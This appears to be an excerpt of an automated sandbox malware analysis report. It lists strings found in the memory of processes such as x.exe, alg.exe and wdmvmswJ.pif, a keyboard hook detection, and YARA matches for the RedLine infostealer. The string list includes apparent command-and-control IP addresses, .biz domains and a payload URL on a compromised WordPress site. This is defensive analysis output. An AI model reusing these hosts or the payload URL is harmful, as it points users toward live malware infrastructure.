                Source: alg.exe, 00000010.00000003.1637081830.00000000005A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/w
                Source: alg.exe, 00000010.00000003.1637081830.00000000005A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/wV
                Source: alg.exe, 00000010.00000003.2054624676.00000000005A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/wstlgiiatb
                Source: alg.exe, 00000010.00000003.2054624676.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2066991172.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/wstlgu6
                Source: alg.exe, 00000010.00000003.1671538833.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1644399119.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1660027657.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1668502646.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1697189867.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1690720549.0000000000596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/rwebgnmbtiq&
                Source: alg.exe, 00000010.00000003.1637081830.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1644399119.0000000000596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/w0
                Source: alg.exe, 00000010.00000003.2079470414.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2066991172.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/wstlg
                Source: alg.exe, 00000010.00000003.2066991172.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2044644305.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2079470414.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2028087857.0000000000541000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/wfcpepuolxclud
                Source: alg.exe, 00000010.00000003.2609194797.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2596159011.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2599209394.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/xwfedwcvhvxkiha
                Source: alg.exe, 00000010.00000003.1634866335.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2079470414.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/
                Source: alg.exe, 00000010.00000003.1644399119.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1637081830.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1634866335.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/E6
                Source: alg.exe, 00000010.00000003.2527920432.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2541384610.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/fwiohktfcqxxnbh
                Source: alg.exe, 00000010.00000003.2066991172.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/gs
                Source: alg.exe, 00000010.00000003.2066991172.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2079470414.0000000000541000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/m
                Source: alg.exe, 00000010.00000003.2066991172.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/ohrgkx
                Source: alg.exe, 00000010.00000003.2066991172.00000000005A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/ohrgkxatb
                Source: alg.exe, 00000010.00000003.1634866335.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/s
                Source: alg.exe, 00000010.00000003.1634866335.00000000005A1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1634866335.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/uqcynitxoaix
                Source: alg.exe, 00000010.00000003.2066991172.0000000000596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/ohrgkx
                Source: alg.exe, 00000010.00000003.1634866335.0000000000596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/uqcynitxoaix
                Source: alg.exe, 00000010.00000003.1797911265.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1785132829.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/
                Source: alg.exe, 00000010.00000003.1797911265.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1785132829.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/55
                Source: alg.exe, 00000010.00000003.1785132829.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/95Z4
                Source: alg.exe, 00000010.00000003.1797911265.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/T
                Source: alg.exe, 00000010.00000003.1785132829.00000000005A1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1797911265.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1785132829.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/f
                Source: alg.exe, 00000010.00000003.1785132829.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/gs
                Source: alg.exe, 00000010.00000003.1797911265.00000000005A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/p
                Source: alg.exe, 00000010.00000003.1797911265.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/pe6
                Source: alg.exe, 00000010.00000003.1797911265.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/pu6
                Source: alg.exe, 00000010.00000003.1785132829.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/s
                Source: alg.exe, 00000010.00000003.1918263435.00000000005AD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1917843582.00000000005A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/vdvikkmvoibst
                Source: alg.exe, 00000010.00000003.1797911265.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1785132829.0000000000596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/f0
                Source: alg.exe, 00000010.00000003.1797911265.0000000000596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/p
                Source: alg.exe, 00000010.00000003.2066991172.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000541000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bumxkqgxu.biz/
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                Source: alg.exe, 00000010.00000003.2066991172.0000000000541000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dwrqljrr.biz/
                Source: alg.exe, 00000010.00000003.2079470414.0000000000541000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nqwjmb.biz/
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                Source: alg.exe, 00000010.00000003.2028087857.0000000000541000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tbjrpv.biz/k7/pV
                Source: x.exe, 00000004.00000002.1593299514.000000007F670000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000000.1470846029.0000000000401000.00000020.00000001.01000000.00000004.sdmp, esentutl.exe, 0000000A.00000003.1539123679.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.delphiexpert.ru
                Source: x.exe, 00000004.00000002.1593299514.000000007F670000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000000.1470846029.0000000000401000.00000020.00000001.01000000.00000004.sdmp, esentutl.exe, 0000000A.00000003.1539123679.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.delphiexpert.ruopenSV
                Source: x.exe, x.exe, 00000004.00000002.1544141056.0000000000780000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1478142210.0000000002959000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1596172530.000000007FE2F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1588992126.0000000021CF5000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1478393290.000000007FBDF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1555508277.000000000295A000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002084D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1588565232.0000000021AF0000.00000004.00000020.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000000.1541408812.0000000000416000.00000002.00000001.01000000.00000007.sdmp, wdmvmswJ.pif, 0000001E.00000000.1659150073.0000000000416000.00000002.00000001.01000000.00000007.sdmp, wdmvmswJ.pif, 00000026.00000000.1748296146.0000000000416000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.pmail.com
                Source: wdmvmswJ.pif, 0000000C.00000003.2071578798.0000000020950000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
                Source: x.exe, 00000004.00000002.1544141056.0000000000706000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chichometextiles.com/
                Source: x.exe, 00000004.00000002.1582582313.00000000208DD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chichometextiles.com/wp-
                Source: x.exe, 00000004.00000002.1582582313.00000000208EC000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1544141056.0000000000706000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1544141056.000000000072F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1544141056.00000000006BE000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.00000000208C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chichometextiles.com/wp-admin/233_Jwsmvmdweya
                Source: x.exe, 00000004.00000002.1544141056.00000000006BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chichometextiles.com/wp-admin/233_JwsmvmdweyaM
                Source: x.exe, 00000004.00000002.1544141056.000000000072F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chichometextiles.com:443/wp-admin/233_Jwsmvmdweyah
                Source: wdmvmswJ.pif, 0000000C.00000003.2111219568.0000000020950000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxFailed
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49707 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Installs a global keyboard hook
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifWindows user hook set: 0 keyboard low level C:\Users\Public\Libraries\wdmvmswJ.pifJump to behavior

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 38.1.wdmvmswJ.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 30.2.wdmvmswJ.pif.400000.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 30.1.wdmvmswJ.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 30.1.wdmvmswJ.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 30.2.wdmvmswJ.pif.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 38.1.wdmvmswJ.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 38.2.wdmvmswJ.pif.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 12.1.wdmvmswJ.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
